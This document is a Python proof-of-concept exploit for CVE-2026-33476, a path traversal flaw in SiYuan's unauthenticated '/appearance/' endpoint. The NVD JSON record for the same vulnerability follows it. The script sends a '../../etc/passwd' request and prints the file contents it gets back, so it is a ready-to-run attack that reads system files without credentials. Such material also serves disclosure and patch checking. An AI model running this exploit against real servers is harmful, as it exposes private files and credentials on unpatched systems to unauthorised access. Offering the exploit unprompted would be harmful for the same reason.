CVE-2026-33476

import requests def exploit_poc(target_url): """ PoC for CVE-2026-33476: SiYuan Directory Traversal Attempts to read /etc/passwd from the target server. """ # The vulnerable endpoint is /appearance/*filepath # Using ../ to traverse back to the root directory traversal_payload = "/appearance/../../etc/passwd" full_url = f"{target_url.rstrip('/')}{traversal_payload}" headers = { "User-Agent": "CVE-2026-33476-Scanner" } try: print(f"[+] Sending request to: {full_url}") response = requests.get(full_url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Server responded with 200 OK.") print("[+] File content snippet:") print(response.text[:500]) # Print first 500 chars else: print(f"[-] Request failed with status code: {response.status_code}") if response.status_code == 404: print("[-] File not found or patch applied.") elif response.status_code == 401 or response.status_code == 403: print("[-] Authentication required or access denied (Patch may be applied).") except requests.exceptions.RequestException as e: print(f"[!] Connection error: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://127.0.0.1:6806" exploit_poc(target)

{"cve": {"id": "CVE-2026-33476", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:48.137", "lastModified": "2026-03-23T22:16:31.057", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue."}, {"lang": "es", "value": "SiYuan es un sistema de gestión de conocimiento personal. Antes de la versión 3.6.2, el kernel de Siyuan expone un endpoint de servicio de archivos no autenticado bajo `/appearance/*filepath.` Debido a una sanitización de ruta inadecuada, los atacantes pueden realizar salto de directorio y leer archivos arbitrarios accesibles al proceso del servidor. Las comprobaciones de autenticación excluyen explícitamente este endpoint, permitiendo la explotación sin credenciales válidas. La versión 3.6.2 corrige este problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.2", "matchCriteriaId": "27CB71A7-7208-417A-AE6D-266D57F683E9"}]}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}